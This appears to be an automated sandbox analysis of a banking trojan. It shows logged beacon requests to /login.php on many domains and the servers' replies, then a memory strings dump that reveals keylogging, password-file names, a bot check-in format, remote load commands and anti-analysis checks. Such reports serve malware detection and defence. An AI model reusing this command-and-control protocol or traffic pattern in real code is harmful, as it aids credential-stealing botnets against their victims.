<!DOCTYPE html>.<!--[if lt IE 7 ]><html class="ie ie6" lang="de"> <![endif]-->.<!--[if IE 7 ]><html class="ie ie7" lang="de"> <![endif]-->.<!--[if IE 8 ]><html class="ie ie8" lang="de"> <![endif]-->.<!--[if (gte IE 9)|!(IE)]><!--><html lang="de"> <!--<![endif]-->..<head>. <title>. Seite nicht gefunden | VOCER </title>. <meta http-equiv="content-type" content="text/html; charset=UTF-8" />. <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />. <meta name="google-site-verification" content="1dadkxwwudKR5vNoBw-5lL6J0ONWUI09JWut-PoEGAg" />. <meta http-equiv="expires" content="0">. <link rel="alternate" type="application/rss xml" title="Vocer RSS Feed" href="hXXp://VVV.vocer.org/feed/" />. <meta http-equiv="X-UA-Compatible" content="IE=edge" />.. .<!-- Favions and Touch icons -->. <link rel="shortcut icon" href="hXXp://VVV.vocer.org/wp-content/themes/vocer/images/favicon.ico" />. <!-- iPad, Retina, iOS ... 7: -->. <link rel="apple-touch-icon-precomposed" sizes="152x152" href="hXXp://VVV.vocer.org/wp-content/themes/vocer/images/apple-touch-icon-152x152-precomposed.png">. <!-- iPad, Retina, iOS ... 6: -->. <link rel="apple-touch-icon-precomposed" sizes="144x144" href="hXXp://VVV.vocer.org/wp-content/themes/vocer/images/apple-touch-icon-144x144-precomposed.png">. <!-- iPhon
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: volez.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Mon, 10 Nov 2014 20:01:20 GMT
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Length: 281
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<hr>.<address>Apache/2.2.16 (Debian) Server at volez.eu Port 80</address>.</body></html>...
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lymos.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 10 Nov 2014 20:01:31 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.org/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>The page cannot be found</TITLE>..<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">..<STYLE type="text/css">.. BODY { font: 8pt/12pt verdana }.. H1 { font: 13pt/15pt verdana }.. H2 { font: 8pt/12pt verdana }.. A:link { color: red }.. A:visited { color: maroon }..</STYLE>..</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>..<h1>The page cannot be found</h1>..The page you are looking for might have been removed, had its name changed, or is temporarily unavailable...<hr>..<p>Please try the following:</p>..<ul>..<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>..<li>If you reached this page by clicking a link, contact.. the Web site administrator to alert them that the link is incorrectly formatted...</li>..<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>..</ul>..<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>..<hr>..<p>Technical Information (for support personnel)</p>..<ul>..<li>Go to <a href="hXXp://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> a
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ganiq.eu
Content-Length: 9
Pragma: no-cache
Cookie: qtrans_cookie_test=qTranslate Cookie Test; PHPSESSID=skch52vu4qkpopsecb93cpfmh2
....~7.~'
HTTP/1.0 404 Not Found
Date: Mon, 10 Nov 2014 20:00:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.23
Set-Cookie: qtrans_cookie_test=qTranslate Cookie Test; path=/; domain=ganiq.eu
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: hXXp://ganiq.com/xmlrpc.php
X-UA-Compatible: IE=edge,chrome=1
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>.<html lang="nl-NL" prefix="og: hXXp://ogp.me/ns#" class=" html_stretched responsive av-default-lightbox html_header_top html_logo_left html_menu_right html_slim html_header_sticky html_header_shrinking html_mobile_menu_phone html_content_align_center ">.<head>.<meta charset="UTF-8" />..<!-- page title, displayed in your browser bar -->.<title>Page Not Found - ganiQ</title>..<link rel="icon" href="hXXp://ganiq.com/wp-content/uploads/2013/04/Favicon_16x16px1.png" type="image/png">..<!-- mobile setting -->.<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">..<!-- Scripts/CSS and wp_head hook -->..<!-- This site is optimized with the Yoast WordPress SEO plugin v1.6.3 - hXXps://yoast.com/wordpress/plugins/seo/ -->.<meta property="og:locale" content="nl_NL" />.<meta property="og:type" content="object" />.<meta property="og:title" content="Page Not Found - ganiQ" />.<meta property="og:site_name" content="ganiQ" />.<!-- / Yoast WordPress SEO plugin. -->..<link rel="alternate" type="application/rss xml" title="ganiQ » Feed" href="hXXp://ganiq.com/feed/" />.<link rel="alternate" type="application/rss xml" title="ganiQ » reacties feed" href="hXXp://ganiq.com/comments/feed/" />.<link rel='stylesheet' id='nextgen_gallery_related_images-css' href='hXXp://ganiq.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_galle
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyken.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Mon, 10 Nov 2014 20:01:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.4.30
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.<html xmlns="hXXp://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />. <meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" />..<title>Parkerad hos Loopia</title>. . <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="hXXps://static.loopia.se/responsive/images/iOS-57.png" />. <link rel="apple-touch-icon" media="screen and (resolution: 132dpi)" href="hXXps://static.loopia.se/responsive/images/iOS-72.png" />. <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="hXXps://static.loopia.se/responsive/images/iOS-114.png" />. <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1.0, width=device-width" />.. <link rel="stylesheet" type="text/css" href="hXXps://static.loopia.se/responsive/styles/reset.css" /> . <link rel="stylesheet" type="text/css" href="hXXps://static.loopia.se/responsive/styles/extra-pages.css" />...<script src="hXXps://static.loopia.se/responsive/js/respond-js/respond.src.js"></script> <!-- Script that makes older browsers IE8, FF2 compatible with max- and min-width in MediaQueries --> . .</head>.<body>...<div class="content">...<div class="center"><img src="https://static.loopia.se/responsive/images/extra_pages/parking-skylt.pn
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gadak.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Mon, 10 Nov 2014 20:01:33 GMT
Server: Apache
Content-Length: 326
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>...
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qexer.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Mon, 10 Nov 2014 20:01:28 GMT
Server: Apache / DataZone
Content-Length: 276
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<hr>.<address>Apache / DataZone Server at qexer.eu Port 80</address>.</body></html>...
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyran.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 207
Accept-Ranges: bytes
Date: Mon, 10 Nov 2014 20:01:35 GMT
X-Varnish: 1001493341
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.</body></html>...
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: volar.eu
Content-Length: 9
Pragma: no-cache
Cookie: PHPSESSID=f8hggo3ojirvjakuj6m8ijcju4
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 10 Nov 2014 20:02:42 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.4-14 deb7u8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
<div id="saleslander">. <div class="inner clearfix">.. <span class="icon"></span>. . <h1>volar.eu<span> is for sale!</span></h1>. <h3>Buying this domain means full control and ownership.</h3>. <div class="domain_actions">. <div class="box_payments">. <p>Price in Words:<br/><b>nine hundred and ninety-nine</b></p>. <p>Domain Punycode:<br/><b class="punycode">volar.eu</b></p>. <p>Payment options:</p><p class="paymentimg">. <img style="border:0;" src="hXXp://volar.eu/images/payment/visa.png" alt="Buy and register a domain with VISA" title="Buy and register a domain with VISA" />. <img style="height:28px;" src="http://volar.eu/images/payment/visa_verified.png" alt="Buy and register a domain with VISA" title="Buy and register a domain with VISA" />. <img style="border:0;" src="hXXp://volar.eu/images/payment/mastercard.png" alt="Buy and register a domain with Mastercard" title="Buy and register a domain with Mastercard" />. <img style="height:28px;" src="hXXp://volar.eu/images/payment/mastercard_securecode.png" alt="Buy and register a domain with Mastercard" title="Buy and register a domain with Mastercard" />
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ganiq.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.0 404 Not Found
Date: Mon, 10 Nov 2014 20:00:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.23
Set-Cookie: qtrans_cookie_test=qTranslate Cookie Test; path=/; domain=ganiq.eu
Set-Cookie: PHPSESSID=skch52vu4qkpopsecb93cpfmh2; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: hXXp://ganiq.com/xmlrpc.php
X-UA-Compatible: IE=edge,chrome=1
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>.<html lang="nl-NL" prefix="og: hXXp://ogp.me/ns#" class=" html_stretched responsive av-default-lightbox html_header_top html_logo_left html_menu_right html_slim html_header_sticky html_header_shrinking html_mobile_menu_phone html_content_align_center ">.<head>.<meta charset="UTF-8" />..<!-- page title, displayed in your browser bar -->.<title>Page Not Found - ganiQ</title>..<link rel="icon" href="hXXp://ganiq.com/wp-content/uploads/2013/04/Favicon_16x16px1.png" type="image/png">..<!-- mobile setting -->.<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">..<!-- Scripts/CSS and wp_head hook -->..<!-- This site is optimized with the Yoast WordPress SEO plugin v1.6.3 - hXXps://yoast.com/wordpress/plugins/seo/ -->.<meta property="og:locale" content="nl_NL" />.<meta property="og:type" content="object" />.<meta property="og:title" content="Page Not Found - ganiQ" />.<meta property="og:site_name" content="ganiQ" />.<!-- / Yoast WordPress SEO plugin. -->..<link rel="alternate" type="application/rss xml" title="ganiQ » Feed" href="hXXp://ganiq.com/feed/" />.<link rel="alternate" type="application/rss xml" title="ganiQ » reacties feed" href="hXXp://ganiq.com/comments/feed/" />.<link rel='stylesheet' id='nextgen_gallery_related_images-css' href='hXXp://ganiq.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_galle
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gadoc.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Mon, 10 Nov 2014 20:01:13 GMT
Server: Apache
Content-Length: 326
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>...
GET /login.php HTTP/1.0
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: VVV.vocer.org
Pragma: no-cache
HTTP/1.0 404 Not Found
Date: Mon, 10 Nov 2014 20:01:20 GMT
Server: Apache
X-Powered-By: PHP/5.4.34-nmm1
X-Pingback: hXXp://VVV.vocer.org/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>.<!--[if lt IE 7 ]><html class="ie ie6" lang="de"> <![endif]-->.<!--[if IE 7 ]><html class="ie ie7" lang="de"> <![endif]-->.<!--[if IE 8 ]><html class="ie ie8" lang="de"> <![endif]-->.<!--[if (gte IE 9)|!(IE)]><!--><html lang="de"> <!--<![endif]-->..<head>. <title>. Seite nicht gefunden | VOCER </title>. <meta http-equiv="content-type" content="text/html; charset=UTF-8" />. <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />. <meta name="google-site-verification" content="1dadkxwwudKR5vNoBw-5lL6J0ONWUI09JWut-PoEGAg" />. <meta http-equiv="expires" content="0">. <link rel="alternate" type="application/rss xml" title="Vocer RSS Feed" href="hXXp://VVV.vocer.org/feed/" />. <meta http-equiv="X-UA-Compatible" content="IE=edge" />.. .<!-- Favions and Touch icons -->. <link rel="shortcut icon" href="hXXp://VVV.vocer.org/wp-content/themes/vocer/images/favicon.ico" />. <!-- iPad, Retina, iOS ... 7: -->. <link rel="apple-touch-icon-precomposed" sizes="152x152" href="hXXp://VVV.vocer.org/wp-content/themes/vocer/images/apple-touch-icon-152x152-precomposed.png">. <!-- iPad, Retina, iOS ... 6: -->. <link rel="apple-touch-icon-precomposed" sizes="144x144" href="hXXp://VVV.vocer.org/wp-content/themes/vocer/images/apple-touch-icon-144x144-precomposed.png">. <!-- iPhon
<<< skipped >>>
GET /login.php HTTP/1.0
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: VVV.galin.eu
Pragma: no-cache
HTTP/1.0 200 OK
Date: Mon, 10 Nov 2014 20:01:00 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7 squeeze19
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 10 Nov 2014 20:01:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tu=9e3d564785c4d8f1cca2f093ea1199ed; expires=Tue, 31-Dec-2019 23:00:00 GMT; path=/; domain=galin.eu; httponly
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_kRkAETah/3CJMrNekOPpyGIBSDnmjZwDxeFWVrsGiGwR2fRBX LxMZCJQnD3raBdML8RxuFc8Sn58DrcVzg/Yg==
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from 070837
Connection: close
.<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_kRkAETah/3CJMrNekOPpyGIBSDnmjZwDxeFWVrsGiGwR2fRBX LxMZCJQnD3raBdML8RxuFc8Sn58DrcVzg/Yg=="><head><meta charset="utf-8" /><style type="text/css">/*!normalize.css v1.1.2 | MIT License | git.io/normalize */ article,aside,details,figcaption,figure,footer,header,hgroup,main,nav,section,summary{display:block;}audio,canvas,video{display:inline-block;*display:inline;*zoom:1;}audio:not([controls]){display:none;height:0;}[hidden]{display:none;}html{font-size:100%;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;}html,button,input,select,textarea{font-family:sans-serif;}body{margin:0;}a:focus{outline:thin dotted;}a:active,a:hover{outline:0;}h1{font-size:2em;margin:0;}h2{font-size:1.33em;margin:0;}h3{font-size:1.1em;margin:0;}h4{font-size:1em;margin:0;}h5{font-size:.83em;margin:0;}h6{font-size:.67em;margin:0;}abbr[title]{border-bottom:1px dotted;}b,strong{font-weight:bold;}blockquote{margin:.11em 40px;}dfn{font-style:italic;}hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0;}mark{background:#ff0;color:#000;}p,pre{margin:.11em 0;}code,kbd,pre,samp{font-family:monospace,serif;_font-family:'courier new',monospace;font-size:1em;}pre{white-space:pre;white-space:pre-wrap;word-wrap:break-word;}q{quotes:none;}q:before,q:after{content:'';content:none;}small{font-size:80%;}sub,sup{font-size:75%;line-height:0;position:re
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: volym.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 500 Internal Server Error
Server: nginx/1.0.14
Date: Mon, 10 Nov 2014 20:01:13 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: close
Content-Length: 640
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>500 Internal Server Error</title>.</head><body>.<h1>Internal Server Error</h1>.<p>The server encountered an internal error or.misconfiguration and was unable to complete.your request.</p>.<p>Please contact the server administrator,. drift@loopia.se and inform them of the time the error occurred,.and anything you might have done that may have.caused the error.</p>.<p>More information about this error may be available.in the server error log.</p>.<hr>.<address>Apache/2.2.22 (FreeBSD) PHP/5.3.10 with Suhosin-Patch Server at volym.eu Port 80</address>.</body></html>...
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: purol.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 500 Internal Server Error
Date: Mon, 10 Nov 2014 20:01:12 GMT
Server: Apache
Content-Length: 2072
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..<html>.<head>..<title>Error 500 - Internal server error</title>.</head>..<body bgcolor="White" text="Black">...<table cellspacing="0" cellpadding="0" width="100%" height="100%" border="0">.<tr>..<td align="center" valign="middle">......<table border="0" cellspacing="0" cellpadding="0">...<tr>....<td rowspan="5" valign="top"><img src="/spicons/server.jpg" width=163 height=177 alt="" border="0"></td>....<td colspan="4"><img src="/spicons/mrblue.gif" width="500" height=2 alt="" border="0"></td>....<td><img src="/spicons/undercover.gif" width=1 height=2 alt="" border="0"></td>...</tr><tr>....<td rowspan="4" valign="bottom"><img src="/spicons/ecke.gif" width=14 height=43 alt="" border="0"></td>......<td valign="middle" align="center" rowspan="2">.....<table cellspacing="1" cellpadding="0" width=470 border="0">.....<tr>......<td><font face="Verdana, Helvetica, sans-serif" size="5" color="Red"><b>Error 500 - Internal server error</b></font><br><img src="/spicons/undercover.gif" width=14 height=5 alt="" border="0"><br></td>.....</tr><tr>......<td><font face="Verdana, Helvetica, sans-serif" size="2" color="Black">The server encountered an unexpected condition which prevented it from fulfilling the request.&
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
winlogon.exe_716_rwx_01A80000_000BF000:
.text
.text
`.data
`.data
.reloc
.reloc
`.rdata
`.rdata
@.data
@.data
@.reloc
@.reloc
http
http
SSSh
SSSh
PASSu:8V
PASSu:8V
PASSu-8V
PASSu-8V
PSSSSSSSh
PSSSSSSSh
t%F;5
t%F;5
12345678
12345678
password1
password1
monkey
monkey
monkey1
monkey1
password
password
Pname.key
Pname.key
\secrets.key
\secrets.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
sysinfo.log
sysinfo.log
scr.jpg
scr.jpg
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
Ý %dh %dm
Ý %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.5.11
4.5.11
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
Referer: hXXp://VVV.google.com
Referer: hXXp://VVV.google.com
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
/search.php
/search.php
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
ntdll.dll
ntdll.dll
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
keygrab
keygrab
u.jpg
u.jpg
IprivLibEx.dll
IprivLibEx.dll
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
sniff.log
sniff.log
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.bing.com
VVV.microsoft.com
VVV.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.5.11&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.5.11&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\opera.exe
\opera.exe
\cbmain.ex
\cbmain.ex
\iscc.exe
\iscc.exe
\clmain.exe
\clmain.exe
%s.dbf
%s.dbf
%s.DBF
%s.DBF
pop2://%s:%s@%s:%i
pop2://%s:%s@%s:%i
pop3://%s:%s@%s:%i
